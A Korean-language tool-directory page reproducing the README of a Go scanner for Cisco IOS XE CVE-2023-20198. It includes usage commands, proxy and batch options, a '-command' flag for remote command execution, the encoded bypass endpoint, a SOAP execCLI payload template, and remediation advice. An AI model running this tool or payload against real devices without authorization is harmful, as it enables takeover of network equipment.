Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cisco-cve-2023-20198-checker — Go 기반 취약점 스캐너로, Cisco IOS XE 장치에서 CVE-2023-20198을 탐지합니다. 배치 스캐닝과 HTML 보고서 생성을 통해 SOAP/XML 인터페이스(WSMA)를 테스트하여 원격 코드 실행을 확인합니다. | Kitploit
도구/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
Vulnerability ScannersExploitationWeb Application ExploitationNetwork SecurityPenetration TestingCommand and Control
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

Go 기반 취약점 스캐너로, Cisco IOS XE 장치에서 CVE-2023-20198을 탐지합니다. 배치 스캐닝과 HTML 보고서 생성을 통해 SOAP/XML 인터페이스(WSMA)를 테스트하여 원격 코드 실행을 확인합니다.

저장소 보기
96개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Cisco CVE-2023-20198 점검기

Go Version License Platform

Cisco IOS XE 장치에서 CVE-2023-20198을 탐지하는 전문 취약점 스캐너입니다. 취약한 SOAP/XML 인터페이스(WSMA)를 테스트합니다. 승인된 보안 평가 및 네트워크 감사를 위해 설계되었습니다.

⚠️ 법적 고지

승인된 보안 테스트 전용

이 도구는 다음 용도로만 사용해야 합니다:

  • 승인된 취약점 스캔
  • 명시적인 서면 동의를 받은 보안 감사
  • 네트워크 보안 평가
  • 통제된 실습 환경에서의 교육 목적
  • 규정 준수 및 침투 테스트

권한 없이 컴퓨터 시스템에 접근하는 것은 불법입니다. 시스템을 테스트하기 전에 항상 적절한 권한이 있는지 확인하십시오.


🚀 빠른 시작

설치

go install 사용 (권장)

go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

바이너리는 $GOPATH/bin 디렉토리(보통 ~/go/bin)에 설치됩니다.

수동 설치

# 저장소 복제
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# 빌드
go build -o cisco-cve-2023-20198-checker

# 설치 (선택사항)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

기본 사용법

# 단일 대상 점검
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# 여러 대상 점검
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# HTML 보고서 생성
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 기능

  • ✅ 취약점 탐지 - CVE-2023-20198 (WSMA RCE) 테스트
  • ✅ 단일 및 배치 대상 스캔
  • ✅ 사용자 정의 포트 지원 (기본값: 443)
  • ✅ SOAP/XML을 통한 명령 실행
  • ✅ 전문 HTML 보고서 생성
  • ✅ 외부 종속성 없음
  • ✅ 크로스 플랫폼 (Linux, macOS, Windows)
  • ✅ SSL/TLS 인증서 건너뛰기 옵션
  • ✅ 구성 가능한 타임아웃
  • ✅ 프록시 지원 (HTTP, HTTPS, SOCKS5)
  • ✅ 인증이 필요한 프록시
  • ✅ 환경 변수 지원 (HTTP_PROXY, HTTPS_PROXY)

🌐 프록시 지원

기업 환경에 완벽합니다! 다음을 지원합니다:

  • HTTP/HTTPS 프록시
  • SOCKS5 프록시 (SSH 터널, Tor)
  • 인증이 필요한 프록시
  • 환경 변수
# HTTP 프록시
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (SSH 터널)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# 환경 변수
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

자세한 프록시 구성은 PROXY_GUIDE.md를 참조하세요.


💻 명령줄 옵션

플래그유형기본값설명
-targetstring-단일 대상 IP/호스트명
-targets-filestring-대상 목록 파일 (한 줄에 하나)
-portint443HTTPS/SOAP 포트
-usernamestringadminSOAP 사용자 이름
-passwordstring-필수. SOAP 비밀번호
-commandstringuname -a실행할 명령어
-htmlboolfalseHTML 보고서 생성
-timeoutint10요청 타임아웃 (초)
-skip-verifybooltrueSSL 인증서 검증 건너뛰기
-proxystring-프록시 URL (http://, https://, socks5://)

📖 사용 예제

단일 대상 테스트

# 기본 취약점 점검
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# 사용자 정의 포트
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# 특정 명령어 실행
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# 보고서 생성
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

배치 테스트

# 대상 파일 생성
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# 모든 대상 테스트
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# HTML 보고서 포함 배치
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

고급 명령어

# 네트워크 열거
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# 버전 탐지
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# HTTP 프록시 사용
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 프록시 사용 (SSH 터널)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# 인증이 필요한 프록시
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 CVE-2023-20198 정보

취약점 세부사항

CVE ID: CVE-2023-20198
CVSS 점수: 10.0 (심각)
유형: 원격 코드 실행 (RCE)
영향: Cisco IOS XE Web UI (WSMA)

기술 세부사항

  • 엔드포인트: /%2577ebui_wsma_https (경로 인코딩 우회)
  • 프로토콜: HTTPS를 통한 SOAP 1.1
  • 인증: WS-Security UsernameToken (유효한 자격 증명 필요)
  • 네임스페이스: urn:cisco:wsma-exec
  • 영향: 유효한 자격 증명으로 장치 완전 장악

SOAP 요청 구조

<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ 해결 방법

시스템 관리자용

장치가 취약한 경우:

1. WSMA 비활성화 (필요하지 않은 경우)

no ip http server
no ip http secure-server

2. ACL로 접근 제한

ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. 펌웨어 업데이트 - 최신 Cisco 보안 패치 적용

4. 강력한 인증 사용

aaa new-model
aaa authentication login default group tacacs+ local

5. 로그 모니터링 - 의심스러운 SOAP/HTTP 활동 감시


🏗️ 소스에서 빌드

사전 요구사항

  • Go 1.21 이상

빌드

# 표준 빌드
go build -o cisco-cve-2023-20198-checker

# 최적화 (더 작은 바이너리)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# 플랫폼 간 크로스 컴파일
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 출력 예제

터미널 출력

╔═══════════════════════════════════════════════════════════╗
║     Cisco SOAP/XML 보안 점검기                            ║
║     교육 및 승인된 보안 평가 전용                         ║
╚═══════════════════════════════════════════════════════════╝

[*] 명령어: show version
[*] 포트: 443
[*] 타임아웃: 10초

[1/1] 대상 테스트 중: 192.168.1.100:443
[*] SOAP 요청 전송 중...
[+] 응답 수신 (상태: 200)
[+] 성공!

╔═══════════════════════════════════════════════════════════╗
║                    배치 결과                              ║
╚═══════════════════════════════════════════════════════════╝

[✓] 192.168.1.100:443 - 성공
Cisco IOS XE Software, Version 16.09.04...

╔═══════════════════════════════════════════════════════════╗
║                      요약                                 ║
╚═══════════════════════════════════════════════════════════╝
총 대상: 1
성공: 1
실패: 0

HTML 보고서

전문 보안 평가 보고서에는 다음이 포함됩니다:

  • 통계 대시보드
  • 상세 구성
  • 명령어 출력 (터미널 스타일)
  • 기술 메타데이터
  • 법적 고지

🤝 기여

기여를 환영합니다! 다음 절차를 따라주세요:

  1. 저장소를 포크하세요
  2. 기능 브랜치를 만드세요
  3. 변경 사항을 적용하세요
  4. 풀 리퀘스트를 제출하세요

📝 라이선스

MIT 라이선스 - LICENSE 파일 참조


🔗 참고 자료

  • Cisco 보안 권고
  • CVE-2023-20198 상세 정보
  • OWASP API 보안

⚖️ 책임 있는 공개

이 도구는 승인된 취약점 스캔만을 위한 것입니다. 저자는 오용에 대한 책임을 지지 않습니다. 소유하지 않은 시스템을 테스트하기 전에 항상 서면 허가를 받으십시오.


보안 커뮤니티를 위해 제작됨 🛡️

도구 다운로드